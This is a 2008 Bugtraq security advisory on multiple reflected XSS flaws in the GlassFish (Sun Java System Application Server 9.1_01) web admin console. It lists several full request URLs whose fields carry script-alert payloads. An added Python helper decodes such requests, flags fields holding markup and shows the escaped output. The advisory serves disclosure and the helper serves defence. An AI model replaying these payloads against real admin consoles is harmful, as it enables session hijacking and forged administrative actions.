Multiple XSS - Glassfish Web Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) )
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Multiple XSS - Glassfish Web Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) )
- From: "Eduardo Jorge" <serrano.neves@xxxxxxxxx>
- Date: Sat, 14 Jun 2008 19:42:21 -0300
==============================
Multiple XSS - Glassfish Web Interface (Sun Java System Application
Server 9.1_01 (build b09d-fcs) )
==============================
Author: Eduardo Neves a.k.a _eth0_
Date: 14 June 2008
Site: http://webappsecurity.wordpress.com
==============================
APPLICATION : Glassfish webadmin interface
VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs)
VENDOR : http://www.sun.com
DOWNLOAD : https://glassfish.dev.java.net/
==============================
IMPACT: XSS, XSRF, etc.
Severity: Low (or not?)
==============================
Description:
This vulnerability affects several pages in the Glassfish webadmin interface.
It allows a user to insert malicious or unexpected input data into the
input fields. It was found in 10+ input data fields in Glassfish.
These are vulnerable URLs:
http://[HOSTNAME]:4848/resourceNode/customResourceNew.jsf?propertyForm%3Aproper
tyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPage
%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Ealer
t%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Aproperty
Sheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27x
ss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3A
propertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%2
7xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%
3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%
3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSecti
onTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=customresou
rcescreate.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_
id276%3Aj_id282&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3Apr
opertyContentPage%3AtopButtons%3AnewButton
http://[HOSTNAME]:4848/resourceNode/externalResourceNew.jsf?propertyForm%3Aprope
rtyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPag
e%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Eale
rt%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Apropert
ySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27
xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3
ApropertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%
27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet
%3ApropertSectionTextField%3AjndiLookupProp%3AjndiLookup=%3Cscript%3Ealert%28%27
xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3
ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3
C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectio
nTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3ApropertyContentPage%
3AhelpKey=externalresourcescreate.html&propertyForm_hidden=propertyForm_hidden&j
avax.faces.ViewState=j_id289%3Aj_id293&com_sun_webui_util_FocusManager_focusElem
entId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton
http://[HOSTNAME]:4848/resourceNode/jmsDestinationNew.jsf?propertyForm%3Apropert
yContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Aprop
ertSectionTextField%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fs
cript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Anam
e=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyShee
t%3ApropertSectionTextField%3AresTypeProp%3AresType=javax.jms.Topic&propertyForm
%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%2
8%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSectionTex
tField%3AstatusProp%3Acb=true&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3
Acol1St=Description&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol3%3Acol1St=&p
ropertyForm%3AhelpKey=jmsdestinationnew.html%09&propertyForm_hidden=propertyForm
_hidden&javax.faces.ViewState=j_id242%3Aj_id246&com_sun_webui_util_FocusManager_
focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton
http://[HOSTNAME]:4848/resourceNode/jmsConnectionNew.jsf?propertyForm%3Aproperty
ContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Agener
alPropertySheet%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscrip
t%3E&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AresTypeProp%3AresType
=javax.jms.TopicConnectionFactory&propertyForm%3ApropertySheet%3AgeneralProperty
Sheet%3AdescProp%3Acd=%3Cscript%3Ealert%28%27xss2%27%29%3B%3C%2Fscript%3E&proper
tyForm%3ApropertySheet%3AgeneralPropertySheet%3AstatusProp%3Asun_checkbox9=true&
propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AinitSizeProp%3Ads=8&p
ropertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxProp%3Ads2=32&prope
rtyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AresizeProp%3Ads3=2&propert
yForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AidleProp%3Ads=300&propertyFo
rm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxWaitProp%3Ads=60000&property
Form%3ApropertySheet%3ApoolSettingsPropertySheet%3Atransprop%3Atrans=&propertyFo
rm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3Acol1St=Password&propertyForm%3AbasicTab
le%3ArowGroup1%3A0%3Acol3%3Acol1St=guest&propertyForm%3AbasicTable%3ArowGroup1%3
A1%3Acol2%3Acol1St=UserName&propertyForm%3AbasicTable%3ArowGroup1%3A1%3Acol3%3Ac
ol1St=guest&propertyForm%3AhelpKey=jmsconnectionnew.html&propertyForm_hidden=pro
pertyForm_hidden&javax.faces.ViewState=j_id226%3Aj_id234&com_sun_webui_util_Focu
sManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%
http://[HOSTNAME]:4848/resourceNode/jdbcResourceNew.jsf?propertyForm%3ApropertyC
ontentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Aproper
tSectionTextField%3AjndiProp%3Ajnditext=<script>alert('xss');</script>&propertyF
orm%3ApropertySheet%3ApropertSectionTextField%3ApoolNameProp%3APoolName=__CallFl
owPool&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=
<script>alert('xss3');</script>&propertyForm%3ApropertySheet%3ApropertSectionTex
tField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=jdbcresourcenew.
html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id185%3Aj_i
d201&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyConte
ntPage%3AtopButtons%3AnewButton
http://[HOSTNAME]:4848/applications/lifecycleModulesNew.jsf?propertyForm%3Aprope
rtyContentPage%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Aname=<scri
pt>alert('xss');</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3Ap
ropertSectionTextField%3AclassNameProp%3Aclassname=<script>alert('xss2');</scrip
t>&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%
3ApathProp%3AclassPath=&propertyForm%3ApropertyContentPage%3ApropertySheet%3Apro
pertSectionTextField%3AloadOrderProp%3AloadOrder=<script>alert('xss3');</script>
&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3A
descProp%3Adesc=&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSec
tionTextField%3AstatusProp%3Asun_checkbox8=true&propertyForm%3ApropertyContentPa
ge%3AbottomButtons%3AsaveButton2=++OK++&propertyForm%3AhelpKey=lifecyclemodules.
html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id117%3Aj_i
d125&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyConte
ntPage%3AbottomButtons%3AsaveButton2
http://[HOSTNAME]:4848/resourceNode/jdbcConnectionPoolNew1.jsf?propertyForm%3Apr
opertyContentPage%3AtopButtons%3AnextButton=+Next+&propertyForm%3ApropertyConten
tPage%3ApropertySheet%3AgeneralPropertySheet%3AjndiProp%3Aname=<script>alert('xs
s')</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3AgeneralPropert
ySheet%3AresTypeProp%3AresType=<script>alert('xss2');</script>&propertyForm%3Apr
opertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AdbProp%3Adb=<script>a
lert('xss3');</script>&propertyForm%3AhelpKey=jdbcconnectionpoolnew1.html&proper
tyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id7%3Aj_id34&com_sun_w
ebui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopBu
ttons%3AnextButton
And others =)
--
|_|0|_| Serrano Neves - a.k.a eth0
|_|_|0| http://webappsecurity.wordpress.com
|0|0|0| "Talk is cheap. Show me the code." - Linus Torvalds
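
Added example (not part of the original advisory, and not Glassfish code): a small audit helper for admin-console request URLs such as those listed above. It percent-decodes each query parameter, reports the JSF field whose value carries HTML markup, and shows the HTML-escaped form a page should emit when echoing that value. The host name admin.example and the function name audit_request are assumptions made for the example.

```python
import html
import re
from urllib.parse import urlsplit, parse_qsl

# Characters that let an echoed value break out of HTML text or an attribute.
# Deliberately broad: a quote in a legitimate value is also reported.
MARKUP = re.compile(r"[<>\"']")

def audit_request(url):
    """Return one finding per query parameter whose decoded value carries markup."""
    parts = urlsplit(url)
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if not MARKUP.search(value):
            continue
        findings.append({
            "page": parts.path,
            # JSF client ids are colon-separated; the last segment is the field.
            "field": name.rsplit(":", 1)[-1],
            "decoded": value,
            # What the page should emit when it echoes the value back.
            "escaped": html.escape(value, quote=True),
        })
    return findings

# Constructed sample: a shortened form of the advisory's customResourceNew.jsf
# request, with a placeholder host name (admin.example is an assumption).
SAMPLE = (
    "http://admin.example:4848/resourceNode/customResourceNew.jsf"
    "?propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++"
    "&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField"
    "%3AjndiProp%3AJndiNew=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E"
    "&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField"
    "%3AstatusProp%3Asun_checkbox9=true"
    "&propertyForm_hidden=propertyForm_hidden"
)

if __name__ == "__main__":
    for f in audit_request(SAMPLE):
        print(f"{f['page']} field={f['field']} value={f['decoded']!r}")
        print(f"  safe output: {f['escaped']}")
```

The same function can be run over the request lines of the admin listener's access log to find which fields have received markup.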